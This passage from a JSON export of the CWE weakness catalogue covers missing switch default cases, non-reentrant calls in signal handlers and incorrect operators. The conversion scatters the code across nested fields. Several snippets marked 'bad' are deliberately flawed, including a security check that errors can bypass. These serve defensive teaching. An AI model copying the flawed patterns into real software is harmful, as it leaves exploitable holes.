of the charsets used to encode strings, this constructor was deprecated and replaced by a constructor that accepts as one of its parameters the name of the charset used to encode the bytes for conversion."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Obsolete"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL30-PL","Entry_Name":"Do not import deprecated modules","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP30-PL","Entry_Name":"Do not use deprecated or obsolete functions or modules","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Obsolete","attr":{"@_Date":"2008-01-30"}},{"#text":"Use of Obsolete Functions","attr":{"@_Date":"2017-11-08"}}]}},"478":{"attr":{"@_ID":"478","@_Name":"Missing Default Case in Switch Statement","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not have a default case in a switch statement, which might lead to complex logical errors and resultant weaknesses.","Extended_Description":"This flaw represents a common problem in software development, in which not all possible values for a variable are considered or handled by a given process. Because of this, further decisions are made based on poor information, and cascading failure results. This cascading failure may result in any number of security issues, and constitutes a significant failure in the system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Varies by Context","Alter Execution Logic"],"Note":"Depending on the logical circumstances involved, any consequences may result: e.g., issues of confidentiality, authentication, authorization, availability, integrity, accountability, or non-repudiation."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure that there are no unaccounted for cases, when adjusting flow or values based on the value of a given variable. In switch statements, this can be accomplished through the use of the default label."},{"Phase":"Implementation","Description":"In the case of switch style statements, the very simple act of creating a default case can mitigate this situation, if done correctly. Often however, the default case is used simply to represent an assumed option, as opposed to working as a check for invalid input. This is poor practice and in some cases is as bad as omitting a default case entirely."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following does not properly check the return code in the case where the security_check function returns a -1 value when an error occurs. If an attacker can supply data that will invoke an error, the attacker can bypass the security check:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define FAILED 0#define PASSED 1int result;...result = security_check(data);switch (result) {}...","xhtml:br":["","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case FAILED:case PASSED:","xhtml:div":[{"#text":"printf(\\"Security check failed!\\\\n\\");exit(-1);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//Break never reached because of exit()"},{"#text":"printf(\\"Security check passed.\\\\n\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}},"xhtml:i":"// program execution continues..."}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"#define FAILED 0#define PASSED 1int result;...result = security_check(data);switch (result) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case FAILED:case PASSED:default:","xhtml:div":[{"#text":"printf(\\"Security check failed!\\\\n\\");exit(-1);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//Break never reached because of exit()"},{"#text":"printf(\\"Security check passed.\\\\n\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"printf(\\"Unknown error (%d), exiting...\\\\n\\",result);exit(-1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}}],"Body_Text":["Instead a default label should be used for unaccounted conditions:","This label is used because the assumption cannot be made that all possible cases are accounted for. A good practice is to reserve the default case for error handling."]},{"Intro_Text":"In the following Java example the method getInterestRate retrieves the interest rate for the number of points for a mortgage. The number of points is provided within the input parameter and a switch statement will set the interest rate value to be returned based on the number of points.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public static final String INTEREST_RATE_AT_ZERO_POINTS = \\"5.00\\";public static final String INTEREST_RATE_AT_ONE_POINTS = \\"4.75\\";public static final String INTEREST_RATE_AT_TWO_POINTS = \\"4.50\\";...public BigDecimal getInterestRate(int points) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);switch (points) {}return result;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 0:case 1:case 2:","xhtml:div":[{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public static final String INTEREST_RATE_AT_ZERO_POINTS = \\"5.00\\";public static final String INTEREST_RATE_AT_ONE_POINTS = \\"4.75\\";public static final String INTEREST_RATE_AT_TWO_POINTS = \\"4.50\\";...public BigDecimal getInterestRate(int points) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);switch (points) {}return result;","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 0:case 1:case 2:default:","xhtml:div":[{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.err.println(\\"Invalid value for points, must be 0, 1 or 2\\");System.err.println(\\"Returning null value for interest rate\\");result = null;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}}}}}],"Body_Text":"However, this code assumes that the value of the points input parameter will always be 0, 1 or 2 and does not check for other incorrect values passed to the method. This can be easily accomplished by providing a default label in the switch statement that outputs an error message indicating an invalid value for the points input parameter and returning a null value."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to account for default case in switch"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Switch Statements", Page 337"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Failure to Account for Default Case in Switch","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Use Default Case in Switch","attr":{"@_Date":"2009-05-27"}}]}},"479":{"attr":{"@_ID":"479","@_Name":"Signal Handler Use of a Non-reentrant Function","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program defines a signal handler that calls a non-reentrant function.","Extended_Description":{"xhtml:p":["Non-reentrant functions are functions that cannot safely be called, interrupted, and then recalled before the first call has finished without resulting in memory corruption. This can lead to an unexpected system state and unpredictable results with a variety of potential consequences depending on context, including denial of service and code execution.","Many functions are not reentrant, but some of them can result in the corruption of memory if they are used in a signal handler. The function call syslog() is an example of this. In order to perform its functionality, it allocates a small amount of memory as \\"scratch space.\\" If syslog() is suspended by a signal call and the signal handler calls syslog(), the memory used by both of these functions enters an undefined, and possibly, exploitable state. Implementations of malloc() and free() manage metadata in global structures in order to track which memory is allocated versus which memory is available, but they are non-reentrant. Simultaneous calls to these functions can cause corruption of the metadata."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"828","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"663","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"It may be possible to execute arbitrary code through the use of a write-what-where condition."},{"Scope":"Integrity","Impact":["Modify Memory","Modify Application Data"],"Note":"Signal race conditions often result in data corruption."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Require languages or libraries that provide reentrant functionality, or otherwise make it easier to avoid this weakness."},{"Phase":"Architecture and Design","Description":"Design signal handlers to only set flags rather than perform complex functionality."},{"Phase":"Implementation","Description":"Ensure that non-reentrant functions are not found in signal handlers."},{"Phase":"Implementation","Description":"Use sanity checks to reduce the timing window for exploitation of race conditions. This is only a partial solution, since many attacks might fail, but other attacks still might work within the narrower window, even accidentally.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a signal handler uses syslog() to log a message:","Example_Code":{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"char *message;void sh(int dummy) {}int main(int argc,char* argv[]) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"syslog(LOG_NOTICE,\\"%s\\\\n\\",message);sleep(10);exit(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"...signal(SIGHUP,sh);signal(SIGTERM,sh);sleep(10);exit(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},"If the execution of the first call to the signal handler is suspended after invoking syslog(), and the signal handler is called a second time, the memory allocated by syslog() enters an undefined, and possibly, exploitable state."]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0893","Description":"signal handler calls function that ultimately uses malloc()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0893"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unsafe function call from a signal handler"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG30-C","Entry_Name":"Call only asynchronous-safe functions within signal handlers","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG34-C","Entry_Name":"Do not call signal() from within interruptible signal handlers"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP01-J","Entry_Name":"Never dereference null pointers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, "Signal Vulnerabilities", Page 791"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences"}],"Previous_Entry_Name":{"#text":"Unsafe Function Call from a Signal Handler","attr":{"@_Date":"2010-12-13"}}}},"480":{"attr":{"@_ID":"480","@_Name":"Use of Incorrect Operator","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The programmer accidentally uses the wrong operator, which changes the application logic in security-relevant ways.","Extended_Description":"These types of errors are generally the result of a typo.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic","Note":"This weakness can cause unintended logic to be executed and other unexpected application behavior."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"This weakness can be found easily using static analysis. However in some cases an operator might appear to be incorrect, but is actually correct and reflects unusual logic within the program."},{"Method":"Manual Static Analysis","Description":"This weakness can be found easily using static analysis. However in some cases an operator might appear to be incorrect, but is actually correct and reflects unusual logic within the program."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-140"},"Intro_Text":"The following C/C++ and C# examples attempt to validate an int input parameter against the integer value 100.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}printf(\\"Value is not valid\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Value is valid\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"bool isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}Console.WriteLine(\\"Value is not valid.\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Value is valid.\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"However, the expression to be evaluated in the if statement uses the assignment operator \\"=\\" rather than the comparison operator \\"==\\". The result of using the assignment operator instead of the comparison operator causes the int variable to be reassigned locally and the expression in the if statement will always evaluate to the value on the right hand side of the expression. This will result in the input value not being properly validated, which can cause unexpected results."},{"attr":{"@_Demonstrative_Example_ID":"DX-103"},"Intro_Text":"The following C/C++ example shows a simple implementation of a stack that includes methods for adding and removing integer values from the stack. The example uses pointers to add and remove integer values to the stack array variable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SIZE 50int *tos, *p1, stack[SIZE];void push(int i) {}int pop(void) {}int main(int argc, char *argv[]) {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"p1++;if(p1==(tos+SIZE)) {}*p1 == i;","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack overflow error message and exit"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(p1==tos) {}p1--;return *(p1+1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack underflow error message and exit"}},"xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"tos = stack;p1 = stack;...return 0;","xhtml:br":["","","","","",""],"xhtml:i":["// initialize tos and p1 to point to the top of stack","// code to add and remove items from stack"]}}]}},"Body_Text":["The push method includes an expression to assign the integer value to the location in the stack pointed to by the pointer variable.","However, this expression uses the comparison operator \\"==\\" rather than the assignment operator \\"=\\". The result of using the comparison operator instead of the assignment operator causes erroneous values to be entered into the stack and can cause unexpected results."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using the wrong operator"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP45-C","Entry_Name":"Do not perform assignments in selection statements","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP46-C","Entry_Name":"Do not use a bitwise operator with a Boolean-like operand","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in Computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Typos", Page 289"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Using the Wrong Operator","attr":{"@_Date":"2008-04-11"}}}},"481":{"attr":{"@_ID":"481","@_Name":"Assigning instead of Comparing","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses an operator for assignment when the intention was to perform a comparison.","Extended_Description":"In many languages the compare statement is very close in appearance to the assignment statement and are often confused. This bug is generally the result of a typo and usually causes obvious problems with program execution. If the comparison is in an if statement, the if statement will usually evaluate the value of the right-hand side of the predicate.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"480","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Many IDEs and static analysis products will detect this problem."},{"Phase":"Implementation","Description":"Place constants on the left. If one attempts to assign a constant with a variable, the compiler will produce an error."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-140"},"Intro_Text":"The following C/C++ and C# examples attempt to validate an int input parameter against the integer value 100.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}printf(\\"Value is not valid\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Value is valid\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"bool isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}Console.WriteLine(\\"Value is not valid.\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Value is valid.\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"However, the expression to be evaluated in the if statement uses the assignment 